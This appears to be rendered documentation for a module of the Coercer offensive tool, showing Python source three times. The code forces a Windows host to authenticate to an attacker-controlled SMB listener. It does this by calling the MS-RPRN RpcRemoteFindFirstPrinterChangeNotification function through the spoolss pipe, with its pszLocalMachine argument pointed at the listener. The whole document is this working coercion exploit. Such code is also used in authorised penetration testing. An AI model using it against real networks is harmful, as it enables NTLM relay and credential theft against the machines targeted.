coercer.methods.MS_RPRN.RpcRemoteFindFirstPrinterChangeNotification

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : RpcRemoteFindFirstPrinterChangeNotification.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5 import rprn
10from impacket.dcerpc.v5.dtypes import NULL
11
12
13class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
14    """
15    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)
16
17    Method found by:
18     -
19    """
20
21    exploit_paths = [
22        ("smb", '\\\\{{listener}}\x00')
23    ]
24    
25    access = {
26        "ncan_np": [
27            {
28                "namedpipe": r"\PIPE\spoolss",
29                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
30                "version": "1.0"
31            }
32        ],
33        "ncacn_ip_tcp": [
34            {
35                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
36                "version": "1.0"
37            }
38        ]
39    }
40
41    protocol = {
42        "longname": "[MS-RPRN]: Print System Remote Protocol",
43        "shortname": "MS-RPRN"
44    }
45
46    function = {
47        "name": "RpcRemoteFindFirstPrinterChangeNotification",
48        "opnum": 62,
49        "vulnerable_arguments": ["pszLocalMachine"]
50    }
51
52    def trigger(self, dcerpc_session, target):
53        if dcerpc_session is not None:
54            try:
55                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
56                request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
57                request['hPrinter'] = resp['pHandle']
58                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
59                # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
60                request['fdwOptions'] = 0x00000000
61                request['pszLocalMachine'] = self.path
62                request['dwPrinterLocal'] = 0
63                request['cbBuffer'] = NULL
64                request['pBuffer'] = NULL
65                resp = dcerpc_session.request(request)
66                return ""
67            except Exception as err:
68                return err
69        else:
70            print("[!] Error: dce is None, you must call connect() first.")
71            return None
class RpcRemoteFindFirstPrinterChangeNotification(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
14class RpcRemoteFindFirstPrinterChangeNotification(MSPROTOCOLRPCCALL):
15    """
16    Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)
17
18    Method found by:
19     -
20    """
21
22    exploit_paths = [
23        ("smb", '\\\\{{listener}}\x00')
24    ]
25    
26    access = {
27        "ncan_np": [
28            {
29                "namedpipe": r"\PIPE\spoolss",
30                "uuid": "12345678-1234-abcd-ef00-0123456789ab",
31                "version": "1.0"
32            }
33        ],
34        "ncacn_ip_tcp": [
35            {
36                "uuid": "12345678-1234-ABCD-EF00-0123456789AB",
37                "version": "1.0"
38            }
39        ]
40    }
41
42    protocol = {
43        "longname": "[MS-RPRN]: Print System Remote Protocol",
44        "shortname": "MS-RPRN"
45    }
46
47    function = {
48        "name": "RpcRemoteFindFirstPrinterChangeNotification",
49        "opnum": 62,
50        "vulnerable_arguments": ["pszLocalMachine"]
51    }
52
53    def trigger(self, dcerpc_session, target):
54        if dcerpc_session is not None:
55            try:
56                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
57                request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
58                request['hPrinter'] = resp['pHandle']
59                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
60                # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
61                request['fdwOptions'] = 0x00000000
62                request['pszLocalMachine'] = self.path
63                request['dwPrinterLocal'] = 0
64                request['cbBuffer'] = NULL
65                request['pBuffer'] = NULL
66                resp = dcerpc_session.request(request)
67                return ""
68            except Exception as err:
69                return err
70        else:
71            print("[!] Error: dce is None, you must call connect() first.")
72            return None

Coercing a machine to authenticate using function RpcRemoteFindFirstPrinterChangeNotification (opnum 62) of [MS-RPRN]: Print System Remote Protocol (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/b8b414d9-f1cd-4191-bb6b-87d09ab2fd83)

Method found by: -

exploit_paths = [('smb', '\\\\{{listener}}\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\spoolss', 'uuid': '12345678-1234-abcd-ef00-0123456789ab', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': '12345678-1234-ABCD-EF00-0123456789AB', 'version': '1.0'}]}
protocol = {'longname': '[MS-RPRN]: Print System Remote Protocol', 'shortname': 'MS-RPRN'}
function = {'name': 'RpcRemoteFindFirstPrinterChangeNotification', 'opnum': 62, 'vulnerable_arguments': ['pszLocalMachine']}
def trigger(self, dcerpc_session, target):
53    def trigger(self, dcerpc_session, target):
54        if dcerpc_session is not None:
55            try:
56                resp = rprn.hRpcOpenPrinter(dcerpc_session, '\\\\%s\x00' % target)
57                request = rprn.RpcRemoteFindFirstPrinterChangeNotification()
58                request['hPrinter'] = resp['pHandle']
59                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
60                # https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/41d5c622-ec77-49ff-95e3-69b325ce4e77
61                request['fdwOptions'] = 0x00000000
62                request['pszLocalMachine'] = self.path
63                request['dwPrinterLocal'] = 0
64                request['cbBuffer'] = NULL
65                request['pBuffer'] = NULL
66                resp = dcerpc_session.request(request)
67                return ""
68            except Exception as err:
69                return err
70        else:
71            print("[!] Error: dce is None, you must call connect() first.")
72            return None